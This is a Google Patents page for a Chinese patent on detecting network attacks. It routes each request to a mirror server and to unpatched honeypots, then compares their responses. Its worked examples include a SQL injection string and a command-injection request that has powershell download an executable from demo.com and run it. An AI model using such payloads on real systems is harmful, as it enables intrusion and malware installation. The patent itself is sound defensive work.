CN110995640A - 识别网络攻击的方法及蜜罐防护系统 - Google Patents
识别网络攻击的方法及蜜罐防护系统 Download PDFInfo
- Publication number
- CN110995640A CN110995640A CN201910886864.0A CN201910886864A CN110995640A CN 110995640 A CN110995640 A CN 110995640A CN 201910886864 A CN201910886864 A CN 201910886864A CN 110995640 A CN110995640 A CN 110995640A
- Authority
- CN
- China
- Prior art keywords
- honeypot
- response
- server
- access request
- difference
- Prior art date
- Legal status (The legal status is an assumption and is not a legal conclusion. Google has not performed a legal analysis and makes no representation as to the accuracy of the status listed.)
- Granted
Links
Images
Classifications
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L63/00—Network architectures or network communication protocols for network security
- H04L63/14—Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
- H04L63/1441—Countermeasures against malicious traffic
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/01—Protocols
- H04L67/10—Protocols in which an application is distributed across nodes in the network
- H04L67/1095—Replication or mirroring of data, e.g. scheduling or transport for data synchronisation between network nodes
-
- H—ELECTRICITY
- H04—ELECTRIC COMMUNICATION TECHNIQUE
- H04L—TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
- H04L67/00—Network arrangements or protocols for supporting network services or applications
- H04L67/50—Network services
- H04L67/60—Scheduling or organising the servicing of application requests, e.g. requests for application data transmissions using the analysis and optimisation of the required network resources
Landscapes
- Engineering & Computer Science (AREA)
- Computer Networks & Wireless Communication (AREA)
- Signal Processing (AREA)
- Computer Security & Cryptography (AREA)
- Computer Hardware Design (AREA)
- Computing Systems (AREA)
- General Engineering & Computer Science (AREA)
- Data Exchanges In Wide-Area Networks (AREA)
- Computer And Data Communications (AREA)
Abstract
本发明涉及一种识别网络攻击的方法,包括:经由网络接收访问请求;基于镜像服务器对访问请求的镜像响应与至少一个蜜罐对访问请求的对应蜜罐响应之间的差异度来确定访问请求是否为网络攻击;其中,镜像服务器配置成实现生产服务器的镜像,蜜罐的系统配置成在系统版本上低于生产服务器的系统。其能够提供尽可能真实地模仿生产服务器的蜜罐,并通过蜜罐与网络攻击方之间的通信来识别攻击模式以及所用工具。
Description
技术领域
本发明涉及互联网技术领域,更具体地说,涉及识别网络攻击的方法及蜜罐防护系统。
背景技术
蜜罐技术是通过布置一些作为诱饵的主机、网络服务或者信息,诱使攻击方对它们实施攻击,进而可以对攻击行为进行捕获和分析,了解攻击方所使用的工具与方法,推测攻击意图和动机。
作为边界安全的重要一环,蜜罐可实现为高仿真的服务器,收集各种攻击数据,为系统防范作准备。
然而,在现有技术中,蜜罐的仿真性较差,无法有效模拟真实的生产服务器。例如,常用的一种蜜罐是部署在空闲IP段,正常的访问请求不会访问该IP地址,而一旦该IP被访问,则大概率是异常行为。在这种情况下,如果攻击者得知了哪些IP与端口是蜜罐,则不会再次进入,难以起到有效的捕获效果。另一方面,为了判别访问请求是否是攻击行为,蜜罐会根据已知的规则,包括源IP、文件、行为模式等,将攻击行为与规则库作匹配。但是,如果攻击者使用新的攻击方式,例如蜜罐未添加的规则,则难以起到有效的捕获效果。
发明内容
本发明的一个目的在于提供一种能有效识别网络攻击的方法。
为实现上述目的,本发明公开一种技术方案如下。
一种识别网络攻击的方法,包括:经由网络接收访问请求;基于镜像服务器对访问请求的镜像响应与至少一个蜜罐对访问请求的对应蜜罐响应之间的差异度来确定访问请求是否为网络攻击;其中,镜像服务器配置成实现生产服务器的镜像,蜜罐的系统配置成在系统版本上低于生产服务器的系统。
可选地,该方法还包括:将至少一个蜜罐配置成与生产服务器共用同一IP地址。
可选地,该方法还包括:基于确定访问请求为网络攻击将与镜像响应之间差异度最大的蜜罐响应返回给访问请求的发起端。
可选地,该方法还包括:将第一蜜罐和第二蜜罐分别配置成安装不同的系统版本;比较第一蜜罐的第一蜜罐响应和第二蜜罐的第二蜜罐响应。
可选地,该方法还包括:确定第一蜜罐响应与第二蜜罐响应之间的差异度是否小于第一蜜罐响应或第二蜜罐响应与镜像响应之间的差异度。
本发明的另一目的在于提供一种蜜罐防护系统。
为实现上述目的,本发明公开另一技术方案如下。
一种蜜罐防护系统,用于保护生产服务器免受网络攻击,系统包括:镜像服务器,配置成实现生产服务器的镜像;至少一个蜜罐服务器,蜜罐服务器的系统配置成在系统版本上低于生产服务器的系统;以及决策转发器,配置成与生产服务器、镜像服务器及至少一个蜜罐服务器分别耦合,并配置成经由网络接收访问请求并将访问请求转发至镜像服务器和至少一个蜜罐服务器;其中,决策转发器还配置成基于镜像服务器对访问请求的镜像响应与至少一个蜜罐服务器对访问请求的对应蜜罐响应之间的差异度来确定访问请求是否为网络攻击。
可选地,至少一个蜜罐服务器配置成与生产服务器共用同一IP地址。
可选地,蜜罐服务器为多个,决策转发器配置成基于确定访问请求为网络攻击将与镜像响应之间差异度最大的蜜罐响应返回给访问请求的发起端。
可选地,至少一个蜜罐服务器包括第一蜜罐服务器和第二蜜罐服务器,其中:第一蜜罐服务器和第二蜜罐服务器分别配置成安装不同的系统版本;决策转发器还配置成比较第一蜜罐服务器的第一蜜罐响应和第二蜜罐服务器的第二蜜罐响应。
可选地,决策转发器还配置成确定第一蜜罐响应与第二蜜罐响应之间的差异度是否小于第一蜜罐响应或第二蜜罐响应与镜像响应之间的差异度。
可选地,决策转发器配置成:基于判定访问请求为合规请求,仅将访问请求转发到生产服务器;基于判定访问请求为不合规请求,仅将访问请求转发到至少一个蜜罐服务器。
可选地,决策转发器配置成:基于确定镜像响应与蜜罐响应之间的差异度小于合规阈值,判定访问请求为合规请求。
本发明还公开一种决策转发器,包括:请求接收单元,配置成经由网络接收访问请求;请求转发单元,与请求接收单元相耦合,配置成将访问请求转发至镜像服务器和至少一个蜜罐服务器;以及响应比较单元,配置成基于镜像服务器对访问请求的镜像响应与至少一个蜜罐服务器对访问请求的对应蜜罐响应之间的差异度来确定访问请求是否为网络攻击。
本发明提供的识别网络攻击的方法,能够提供尽可能真实地模仿生产服务器的蜜罐,并通过蜜罐与网络攻击方之间的通信来识别攻击模式以及所用工具。进而,有利于保护生产服务器免受外部攻击影响。本发明提供的蜜罐防护系统可捕获网络攻击并分析其行为特征,了解攻击方所使用的工具与方法,不仅能够有效地为生产服务器提供安全防护,还能够持续诱导攻击方暴露其特征。蜜罐防护系统结构简单、实施成本低,便于在行业内推广。
本发明另外提供决策转发器,其对合规访问请求直接转发至生产服务器,对网络攻击行为进行识别分析,可作为外部网络与生产系统之间可靠的安全屏障。
附图说明
图1示出本发明一实施例提供的识别网络攻击的方法的流程示意图。
图2示出根据本发明一实施例的蜜罐防护系统的拓扑结构示意图。
图3示出根据本发明一实施例的蜜罐防护系统的拓扑结构示意图。
具体实施方式
在以下描述中提出具体细节,以便提供对本发明的透彻理解。然而,本领域的技术人员将清楚地知道,即使没有这些具体细节也可实施本发明的实施例。在本发明中,可进行具体的数字引用,例如“第一元件”、“第二装置”等。但是,具体数字引用不应当被理解为必须服从于其字面顺序,而是应被理解为“第一元件”与“第二元件”不同。
本发明所提出的具体细节只是示范性的,具体细节可以变化,但仍然落入本发明的精神和范围之内。术语“耦合”定义为表示直接连接到组件或者经由另一个组件而间接连接到组件。
以下通过参照附图来描述适于实现本发明的方法、系统和装置的优选实施例。虽然各实施例是针对元件的单个组合来描述,但是应理解,本发明包括所公开元件的所有可能组合。因此,如果一个实施例包括元件A、B和C,而第二实施例包括元件B和D,则本发明也应被认为包括A、B、C或D的其他剩余组合,即使没有明确公开。
如图1所示,本发明一实施例提供一种识别网络攻击的方法,其包括步骤S10、S20以及可选的步骤S30。
该方法可有效识别网络攻击,进而保护生产服务器免受网络攻击的影响。其中,生产服务器是参与系统运行、实现业务逻辑的服务器,应具备良好的稳定性与可靠性。镜像服务器作为生产服务器的镜像,在系统配置方面(包括硬件、软件)与生产服务器完全一致,在网络互连方面也尽量与生产服务器一致。蜜罐则用来模拟生产服务器,诱使外部非法访问对其进行网络攻击,进而识别其攻击模式。
具体来说,生产服务器已安装所有的最新系统补丁与安全策略。镜像服务器与生产服务器进行完全一致的系统配置。蜜罐比生产服务器的系统版本低,且未安装系统补丁。蜜罐服务器的数量至少为1台。
在步骤S10,经由网络接收访问请求。
作为示例,该步骤具体包括接收来自外部互联网的访问请求,在无法判定访问请求的性质(合规请求还是非法请求)的情况下,访问请求将被转发到镜像服务器及蜜罐(至少为1台)两者。
在能够确定访问请求为合规请求的情况下,可以选择仅将该访问请求转发到生产服务器。在能够确定访问请求为非法请求的情况下,可以选择仅将访问请求转发到蜜罐。而为了持续地识别外部攻击手段及工具,蜜罐将保持与外部攻击方之间的通信,以便识别其攻击手段和所用工具。
为了尽量真实地模拟生产服务器,可将蜜罐配置成与生产服务器共用同一IP地址。
在步骤S20,确定镜像服务器对访问请求的镜像响应与至少一个蜜罐对访问请求的对应蜜罐响应之间的差异度。
在接收到转发来的访问请求之后,镜像服务器对该访问请求进行响应。该响应与生产服务器对访问请求的理论响应(实际上并不存在)近乎一致。对合规请求而言,生产服务器可通常查询生产数据库生成生产响应。例如,镜像服务器可通过查询一个仿真数据库来生成这样的镜像响应。
与此同时,在接收到转发来的访问请求之后,蜜罐也对访问请求进行响应。例如,各蜜罐可类似地通过查询同一仿真数据库栏来生成对应的蜜罐响应。
由于蜜罐的系统故意设置成存在漏洞,在访问请求为非法请求的情况下,蜜罐响应与镜像响应将存在显著差异。为此,可使用差异度匹配模型来确定两种响应间的差异,进而确定当前访问请求的性质。在差异度匹配模型中,可以从返回状态码、时间戳、平均响应时长、数据包长度、数据属性、数据格式、数据表名,数据主体内容等方面来分析对比。
仅作为一种示例,差异度匹配模型考虑以下三项中的至少一项:镜像响应的数据包与蜜罐响应的数据包之间的包尺寸差(数据包大小之差);镜像响应的返回时间与蜜罐响应的返回时间之间的时间差;以及镜像响应与蜜罐响应之间的状态差(例如镜像响应的返回状态码与蜜罐响应的返回状态码之差)。差异度匹配模型可分别计算出上述包尺寸差、时间差及状态差,只要其中一项超出特定阈值,即可判定当前访问请求为非法请求。根据具体的实施例,在包尺寸差、时间差及状态差均超出阈值的情况下,才判定当前访问请求为非法请求。
作为另一示例,可在仿真数据库配置若干特殊的标识数据,若是正常的业务请求,其应答数据包中不会包含该特殊的标识数据。但若是访问请求的应答数据包(包括镜像响应及蜜罐响应)中包含该特殊的标识数据时,则无论是镜像服务器还是蜜罐服务器作出的应答,该外部访问请求均可被认定是攻击行为。具体地,若检测发现镜像响应或蜜罐响应的至少一个字段数据与标识数据之间的差低于某个阈值或其中某个字段数据与标识数据相同,则可用来认定攻击行为。这种方式也可实现为一种差异度匹配模型。
作为另一示例,差异度匹配模型可计算包尺寸差与状态差(或时间差)之间的相关性,在当前访问请求对应的上述相关性低于相关性阈值的情况下,确定其为非法请求。作为又一示例,差异度匹配模型可分别计算蜜罐响应序列、镜像响应序列的不确定程度(信息熵),在蜜罐响应序列的信息熵显著高于镜像响应序列的信息熵的情况下,确定当前访问请求为非法请求。
此外,差异度匹配模型可以对包尺寸差、时间差及状态差等分别进行归一化处理,以统一的量纲来衡量镜像响应与蜜罐响应之间的差异度。差异度匹配模型还可以求取包尺寸差、时间差及状态差的平均值,以便在确定差异度时忽略个别异常数据的影响。
在步骤S30,基于确定访问请求为网络攻击,将与镜像响应之间差异度最大的蜜罐响应返回给访问请求的发起端。
作为可选步骤,该步骤是步骤S20的后续分支之一。具体来说,若确定(例如由差异度匹配模型确定)当前访问请求为合规请求,可选择仅将访问请求转发到生产服务器,以实现正常的业务流程。而若确定当前访问请求为非法请求,则后续只进行蜜罐响应。
在蜜罐为多个的情况下(对应的蜜罐响应也为多个),为了诱使攻击方的攻击,可以将与镜像响应之间差异度最大的蜜罐响应返回给访问请求的发起端。持续的蜜罐响应有利于识别攻击方的攻击手段或所用工具,进而能够为生产服务器的安全运行提供有效防护。
根据本发明一些改进的实施例,蜜罐包括第一蜜罐和第二蜜罐,上述识别网络攻击的方法还包括将第一蜜罐和第二蜜罐分别配置成安装不同的系统版本,进而比较第一蜜罐的第一蜜罐响应和第二蜜罐的第二蜜罐响应。在某些情况下(例如,第一蜜罐已更新了某个系统补丁而第二蜜罐并没有),可能被第一蜜罐所漏检的网络攻击有较大可能会被第二蜜罐检测到。作为后续,这时选用第二蜜罐响应返回至请求发起端。
优选情况下,该方法还包括:确定第一蜜罐响应与第二蜜罐响应之间的差异度是否小于第一蜜罐响应或第二蜜罐响应与镜像响应之间的差异度。在访问请求为非法请求的情况下,不同蜜罐响应之间的差异度通常会小于蜜罐响应与镜像响应之间的差异度,利用这一点,也有助于准确地识别网络攻击。
根据本发明的一些实施例,提供一种蜜罐防护系统。如图2所示,这种用于保护生产服务器100免受网络攻击的蜜罐防护系统包括镜像服务器200、决策转发器203、蜜罐服务器211和蜜罐服务器212。
其中,决策服务器203能够与外部互联网连接,而生产服务器100、镜像服务器200以及蜜罐服务器211、212断开与外部互联网的连接,即,它们被置于内网,而决策服务器203被置于外网。
这里,镜像服务器200配置成实现生产服务器100的镜像。蜜罐服务器211、212的系统配置成在系统版本上低于生产服务器100的系统。为了尽量真实地模拟生产服务器,蜜罐服务器211、212采用与生产服务器100相同的IP地址。决策转发器203配置成与生产服务器100、镜像服务器200及蜜罐服务器211、212分别耦合,并配置成经由网络接收来自用户的访问请求,以及将访问请求转发至镜像服务器100和蜜罐服务器211、212。此外,决策转发器203进一步配置成确定镜像服务器200对访问请求的镜像响应与蜜罐服务器211、212对该访问请求的对应蜜罐响应之间的差异度,进而确定访问请求是否为网络攻击。
为了不漏检各种网络攻击,可以为蜜罐服务器211、212分别配置不同的系统版本,例如,蜜罐服务器211安装较生产服务器100的系统版本为低的第一版本,蜜罐服务器212安装较生产服务器100的系统版本更低的第二版本。决策转发器203配置成比较第一蜜罐响应和第二蜜罐响应,例如,若第一蜜罐响应与镜像响应之间的差异度较小而第二蜜罐响应与镜像响应之间的差异度较大,则决策转发器203判定当前访问请求为非法请求。进一步地,决策转发器203可向访问请求发起方返回第二蜜罐响应,以便保持第二蜜罐服务器212与访问请求发起方之间的后续通信,进而识别其攻击模式。
为了更可靠地对网络攻击进行检测,决策转发器203还可配置成确定第一蜜罐响应与第二蜜罐响应之间的差异度是否小于第一蜜罐响应或第二蜜罐响应与镜像响应之间的差异度。
为了便于镜像服务器200和蜜罐服务器211、212分别生成镜像响应和蜜罐响应,镜像服务器200、蜜罐服务器211、212分别与同一仿真数据库通信,该仿真数据库模仿与生产服务器100相耦合的生产数据库,以用于实现关于业务功能的数据查询、读取等功能。
需要说明的是,作为对上述第二实施例的改进,在能够确定访问请求为合规请求的情况下,决策转发器203可以选择仅将该访问请求转发到生产服务器。在能够确定访问请求为非法请求的情况下,可以选择仅将访问请求转发到例如,蜜罐服务器211,并保持蜜罐服务器211与访问请求发起端之间的通信。
为了判定访问请求是否为合规请求,决策转发器203计算镜像响应与(例如)第一蜜罐响应之间的差异度,若该差异度小于合规阈值,决策转发器203判定访问请求为合规请求;否则,将判定访问请求为非法请求。
另一种示例蜜罐防护系统包括生产服务器100、镜像服务器200、蜜罐服务器210和决策转发器203,如图3所示。其中,生产服务器100可通过查询生产数据库101来生成对合规请求的生产响应。在接收到新的外部访问请求时,因未能确定其是否为合规请求,镜像服务器200通过查询仿真数据库201来生成仿真响应,蜜罐服务器210也查询仿真数据库201来生成蜜罐响应,决策转发器203对蜜罐响应与仿真响应进行比较,进而确定外部访问请求是否为网络攻击。
根据本发明一些实施例,提供一种决策转发器,其包括请求接收单元、请求转发单元以及响应比较单元。该决策转发器与镜像服务器及多个蜜罐服务器分别耦合。
其中,请求接收单元配置成经由网络接收外部的访问请求,请求转发单元与请求接收单元相耦合,配置成将访问请求转发至多个蜜罐服务器中的至少一部分及镜像服务器。响应比较单元配置成基于镜像服务器对访问请求的镜像响应与至少一个蜜罐服务器对访问请求的对应蜜罐响应之间的差异度来确定访问请求是否为网络攻击。在计算镜像响应与蜜罐响应之间的差异度时,响应比较单元可计算镜像响应的数据包与蜜罐响应的数据包之间的包尺寸差、镜像响应的返回时间与蜜罐响应的返回时间之间的时间差、以及镜像响应与蜜罐响应之间的状态差。
以下提供关于对访问请求的处理的几个更具体示例。
假设有两个用户从网页端分别发送了一段请求,用户A提交正常请求1,想查询账户1的概况。用户B提交非法请求(SQL注入),内容为-1’union select 1,2from information_schema.schemata--+,用于查询全表的数据库第1、2列内容(通常指用户名和密码)。
生产/镜像服务器具有最新的系统补丁与WEB安全模块,蜜罐则无任何系统补丁与安全策略。
用户A合规请求的交互流程如下:
1、用户A向决策转发器提交访问请求。
2、决策转发器收到请求,无法确定为正常/非法请求,同时向镜像服务器与蜜罐转发。
3、镜像服务器与蜜罐收到请求,与仿真数据库交互。
4、镜像服务器与蜜罐返回请求结果。
5、决策转发器比较两者返回的结果,发现差异性极小,判定为合规请求,向生产服务器发送请求。
6、生产服务器与生产数据库交互内容。
7、生产服务器返回请求结果。
用户B非法请求的交互流程如下:
1、用户B向决策转发器提交访问请求。
2、决策转发器收到请求,无法确定为正常/非法请求,同时向镜像服务器与蜜罐转发。
3、镜像服务器与蜜罐收到请求,与仿真数据库交互。
4、镜像服务器与蜜罐返回请求结果,经过WEB安全模块的内容过滤后,镜像服务器返回的是内容为1的数据,而蜜罐返回的是数据库全表的数据。
5、决策转发器比较两者返回的结果,发现数据包长度差极大,判定为异常请求,直接将蜜罐的返回结果返回给攻击方,以继续收集其行为。
再假设用户C提交非法请求,想利用strust漏洞攻击,内容为/public/demo.php?xcmd=cmd.exe/c powershell(new-objectSystem.Net.WebCilent).DownloadFile(http://demo.com/example.exe,SystemRoot/test.exe);start SystemRoot/test.exe HTTP/1.1,用于系统命令注入(病毒木马下载)。
用户C非法请求的交互流程如下:
1、用户C向决策转发器提交访问请求。
2、决策转发器收到请求,无法确定为正常/非法请求,同时向镜像服务器与蜜罐群转发。
3、镜像服务器与蜜罐收到请求,蜜罐1和2执行命令,开始下载病毒木马,返回状态码200;生产服务器无该漏洞,未授权访问,返回状态码403。
4、决策转发器分析所有返回的结果,状态的差异性极大,而且蜜罐1和2返回结果的时间明显更久(有下载时长),判为异常请求。其中将与生产服务器差异最大的返回结果(如蜜罐1的返回结果)返回给攻击方,并继续收集数据。
在本发明的一些实施例中,系统的至少一部分甚至可采用通信网络所连接的一组分布式计算装置来实现,或,基于“云”来实现。在这种系统中,多个计算装置共同操作,以通过使用其共享资源来提供服务。基于“云”的实现可提供开放性、灵活性和可扩展性、可中心管理、可靠性等优势,并具有聚合和分析跨多个用户的信息的能力。
根据本发明的一些实施例,提供一种计算机可读介质,其上存储有计算机程序,该计算机程序被处理器执行时实现上述识别网络攻击的方法。
根据本发明的一些实施例,提供一种计算机设备,包括存储器、处理器以及存储于存储器上并可由处理器运行的计算机程序,处理器执行计算机程序时实现识别网络攻击的方法。
本领域的技术人员将会理解,结合本文中所公开的方面所描述的各种说明性逻辑块、模块、电路和算法步骤可以被实现为电子硬件、计算机软件或两者的组合。为了表明硬件和软件间的可互换性,各种说明性部件、块、模块、电路和步骤在上文根据其功能性总体地进行了描述。这样的功能性是实现为硬件还是软件将取决于特定应用以及对总体系统所施加的设计限制。技术人员可以针对具体的特定应用、按照变化的方式来实现所描述的功能性,但是,这样的实现方式决策不应当被理解为引起与本发明范围的背离。
上述说明仅针对于本发明的优选实施例,并不在于限制本发明的保护范围。本领域技术人员可能作出各种变形设计,而不脱离本发明的思想及附随的权利要求。
Claims (24)
1.一种识别网络攻击的方法,包括:
经由网络接收访问请求;
基于镜像服务器对所述访问请求的镜像响应与至少一个蜜罐对所述访问请求的对应蜜罐响应之间的差异度来确定所述访问请求是否为网络攻击;
其中,所述镜像服务器配置成实现生产服务器的镜像,所述蜜罐的系统配置成在系统版本上低于所述生产服务器的系统。
2.根据权利要求1所述的方法,还包括:
将所述至少一个蜜罐配置成与所述生产服务器共用同一IP地址。
3.根据权利要求1所述的方法,其特征在于,所述蜜罐包括多个,所述方法还包括:
基于确定所述访问请求为网络攻击,将与所述镜像响应之间差异度最大的所述蜜罐响应返回给所述访问请求的发起端。
4.根据权利要求1所述的方法,其特征在于,所述至少一个蜜罐包括第一蜜罐和第二蜜罐,所述方法还包括:
将所述第一蜜罐和第二蜜罐分别配置成安装不同的系统版本;
比较所述第一蜜罐的第一蜜罐响应和所述第二蜜罐的第二蜜罐响应。
5.根据权利要求4所述的方法,其特征在于,所述方法还包括:
确定所述第一蜜罐响应与所述第二蜜罐响应之间的差异度是否小于所述第一蜜罐响应或所述第二蜜罐响应与所述镜像响应之间的差异度。
6.根据权利要求1-5中任一项所述的方法,其特征在于,所述差异度包括如下项中的至少一项:
所述镜像响应的数据包与所述蜜罐响应的数据包之间的包尺寸差;
所述镜像响应的返回时间与所述蜜罐响应的返回时间之间的时间差;
所述镜像响应与所述蜜罐响应之间的状态差;以及
所述镜像响应或所述蜜罐响应的至少一个字段数据与标识数据之间的差。
7.一种蜜罐防护系统,用于保护生产服务器免受网络攻击,所述系统包括:
镜像服务器,配置成实现生产服务器的镜像;
至少一个蜜罐服务器,所述蜜罐服务器的系统配置成在系统版本上低于所述生产服务器的系统;以及
决策转发器,配置成与所述生产服务器、镜像服务器及所述至少一个蜜罐服务器分别耦合,并配置成经由网络接收访问请求并将所述访问请求转发至所述镜像服务器和所述至少一个蜜罐服务器;
其中,所述决策转发器还配置成基于所述镜像服务器对所述访问请求的镜像响应与所述至少一个蜜罐服务器对所述访问请求的对应蜜罐响应之间的差异度来确定所述访问请求是否为网络攻击。
8.根据权利要求7所述的系统,其特征在于,所述至少一个蜜罐服务器配置成与所述生产服务器共用同一IP地址。
9.根据权利要求7所述的系统,其特征在于,所述蜜罐服务器为多个,所述决策转发器配置成基于确定所述访问请求为网络攻击将与所述镜像响应之间差异度最大的所述蜜罐响应返回给所述访问请求的发起端。
10.根据权利要求7所述的系统,其特征在于,所述至少一个蜜罐服务器包括第一蜜罐服务器和第二蜜罐服务器,其中:
所述第一蜜罐服务器和第二蜜罐服务器分别配置成安装不同的系统版本;
所述决策转发器还配置成比较所述第一蜜罐服务器的第一蜜罐响应和所述第二蜜罐服务器的第二蜜罐响应。
11.根据权利要求10所述的系统,其特征在于,所述决策转发器还配置成确定所述第一蜜罐响应与所述第二蜜罐响应之间的差异度是否小于所述第一蜜罐响应或第二蜜罐响应与所述镜像响应之间的差异度。
12.根据权利要求7-11中任一项所述的系统,其特征在于,所述差异度包括如下项中的至少一项:
所述镜像响应的数据包与所述蜜罐响应的数据包之间的包尺寸差;
所述镜像响应的返回时间与所述蜜罐响应的返回时间之间的时间差;以及
所述镜像响应与所述蜜罐响应之间的状态差。
13.根据权利要求12所述的系统,其特征在于,所述镜像服务器配置成基于与仿真数据库的通信来生成所述仿真响应,并且所述至少一个蜜罐服务器配置成基于与所述仿真数据库的通信来生成所述蜜罐响应。
14.根据权利要求12所述的系统,其特征在于,所述决策转发器配置成:
基于判定所述访问请求为合规请求,仅将所述访问请求转发到所述生产服务器;
基于判定所述访问请求为不合规请求,仅将所述访问请求转发到所述至少一个蜜罐服务器。
15.根据权利要求12所述的系统,其特征在于,所述决策转发器配置成:
基于确定所述镜像响应与所述蜜罐响应之间的差异度小于合规阈值,判定所述访问请求为合规请求。
16.根据权利要求7-11中任一项所述的系统,其特征在于,所述决策转发器配置成与外部互联网连接,而所述镜像服务器、所述至少一个蜜罐服务器分别配置成断开与外部互联网的连接。
17.一种决策转发器,包括:
请求接收单元,配置成经由网络接收访问请求;
请求转发单元,与所述请求接收单元相耦合,配置成将访问请求转发至镜像服务器和至少一个蜜罐服务器;以及
响应比较单元,配置成基于所述镜像服务器对所述访问请求的镜像响应与所述至少一个蜜罐服务器对所述访问请求的对应蜜罐响应之间的差异度来确定所述访问请求是否为网络攻击。
18.根据权利要求17所述的决策转发器,其特征在于,所述蜜罐服务器为多个,所述决策转发器配置成基于确定所述访问请求为网络攻击将与所述镜像响应之间差异度最大的所述蜜罐响应返回给所述访问请求的发起端。
19.根据权利要求17所述的决策转发器,其特征在于,所述至少一个蜜罐服务器包括分别安装不同的系统版本的第一蜜罐服务器和第二蜜罐服务器;所述决策转发器配置成比较所述第一蜜罐服务器的第一蜜罐响应和所述第二蜜罐服务器的第二蜜罐响应。
20.根据权利要求17所述的决策转发器,其特征在于,所述决策转发器还配置成确定所述第一蜜罐响应与所述第二蜜罐响应之间的差异度是否小于所述第一蜜罐响应或第二蜜罐响应与所述镜像响应之间的差异度。
21.根据权利要求17所述的决策转发器,其特征在于,所述决策转发器配置成计算以下差异度中的一个或多个:
所述镜像响应的数据包与所述蜜罐响应的数据包之间的包尺寸差;
所述镜像响应的返回时间与所述蜜罐响应的返回时间之间的时间差;
所述镜像响应与所述蜜罐响应之间的状态差;以及
所述镜像响应或所述蜜罐响应的至少一个字段数据与标识数据之间的差。
22.根据权利要求17-21中的任一项所述的决策转发器,其特征在于,所述决策转发器配置成:
基于判定所述访问请求为合规请求,仅将所述访问请求转发到与所述决策转发器相耦合的生产服务器;
基于判定所述访问请求为不合规请求,仅将所述访问请求转发到所述至少一个蜜罐服务器。
23.一种计算机可读介质,其上存储有计算机程序,其特征在于,
该计算机程序被处理器执行时实现权利要求1-6中任一项所述的识别网络攻击的方法。
24.一种计算机设备,包括存储器、处理器以及存储于存储器上并可由处理器运行的计算机程序,其特征在于,所述处理器执行所述计算机程序时实现权利要求1-6任一项所述的识别网络攻击的方法。
Priority Applications (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910886864.0A CN110995640B (zh) | 2019-09-19 | 2019-09-19 | 识别网络攻击的方法及蜜罐防护系统 |
Applications Claiming Priority (1)
| Application Number | Priority Date | Filing Date | Title |
|---|---|---|---|
| CN201910886864.0A CN110995640B (zh) | 2019-09-19 | 2019-09-19 | 识别网络攻击的方法及蜜罐防护系统 |
Publications (2)
| Publication Number | Publication Date |
|---|---|
| CN110995640A true CN110995640A (zh) | 2020-04-10 |
| CN110995640B CN110995640B (zh) | 2022-04-05 |
Family
ID=70081830
Family Applications (1)
| Application Number | Title | Priority Date | Filing Date |
|---|---|---|---|
| CN201910886864.0A Active CN110995640B (zh) | 2019-09-19 | 2019-09-19 | 识别网络攻击的方法及蜜罐防护系统 |
Country Status (1)
| Country | Link |
|---|---|
| CN (1) | CN110995640B (zh) |
Cited By (7)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN112637150A (zh) * | 2020-12-10 | 2021-04-09 | 广东睿江云计算股份有限公司 | 一种基于nginx的蜜罐分析方法及其系统 |
| CN112817833A (zh) * | 2021-01-20 | 2021-05-18 | 中国银联股份有限公司 | 一种监测数据库的方法及装置 |
| CN112995151A (zh) * | 2021-02-08 | 2021-06-18 | 腾讯科技(深圳)有限公司 | 访问行为处理方法和装置、存储介质及电子设备 |
| CN113162912A (zh) * | 2021-03-12 | 2021-07-23 | 中航智能建设(深圳)有限公司 | 基于大数据的网络安全保护方法、系统及存储设备 |
| WO2022111268A1 (en) * | 2020-11-25 | 2022-06-02 | International Business Machines Corporation | Defense of targeted database attacks through dynamic honeypot database response generation |
| CN114785555A (zh) * | 2022-03-25 | 2022-07-22 | 中国建设银行股份有限公司 | 一种应对DDoS攻击的防护方法及系统 |
| CN115134098A (zh) * | 2021-03-12 | 2022-09-30 | 北京沃东天骏信息技术有限公司 | 一种黑客信息获取方法、装置、电子设备及存储介质 |
Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103684895A (zh) * | 2012-09-10 | 2014-03-26 | 百度在线网络技术(北京)有限公司 | 一种产生克隆环境的方法和装置 |
| CN105359157A (zh) * | 2013-07-09 | 2016-02-24 | 国际商业机器公司 | 网络安全系统 |
| US10044675B1 (en) * | 2014-09-30 | 2018-08-07 | Palo Alto Networks, Inc. | Integrating a honey network with a target network to counter IP and peer-checking evasion techniques |
| CN109167792A (zh) * | 2018-09-19 | 2019-01-08 | 四川长虹电器股份有限公司 | 一种基于Nginx的新型WAF设计方法 |
| CN109347794A (zh) * | 2018-09-06 | 2019-02-15 | 国家电网有限公司 | 一种Web服务器安全防御方法 |
-
2019
- 2019-09-19 CN CN201910886864.0A patent/CN110995640B/zh active Active
Patent Citations (5)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| CN103684895A (zh) * | 2012-09-10 | 2014-03-26 | 百度在线网络技术(北京)有限公司 | 一种产生克隆环境的方法和装置 |
| CN105359157A (zh) * | 2013-07-09 | 2016-02-24 | 国际商业机器公司 | 网络安全系统 |
| US10044675B1 (en) * | 2014-09-30 | 2018-08-07 | Palo Alto Networks, Inc. | Integrating a honey network with a target network to counter IP and peer-checking evasion techniques |
| CN109347794A (zh) * | 2018-09-06 | 2019-02-15 | 国家电网有限公司 | 一种Web服务器安全防御方法 |
| CN109167792A (zh) * | 2018-09-19 | 2019-01-08 | 四川长虹电器股份有限公司 | 一种基于Nginx的新型WAF设计方法 |
Cited By (12)
| Publication number | Priority date | Publication date | Assignee | Title |
|---|---|---|---|---|
| WO2022111268A1 (en) * | 2020-11-25 | 2022-06-02 | International Business Machines Corporation | Defense of targeted database attacks through dynamic honeypot database response generation |
| GB2616389A (en) * | 2020-11-25 | 2023-09-06 | Ibm | Defense of targeted database attacks through dynamic honeypot database response generation |
| US11824894B2 (en) | 2020-11-25 | 2023-11-21 | International Business Machines Corporation | Defense of targeted database attacks through dynamic honeypot database response generation |
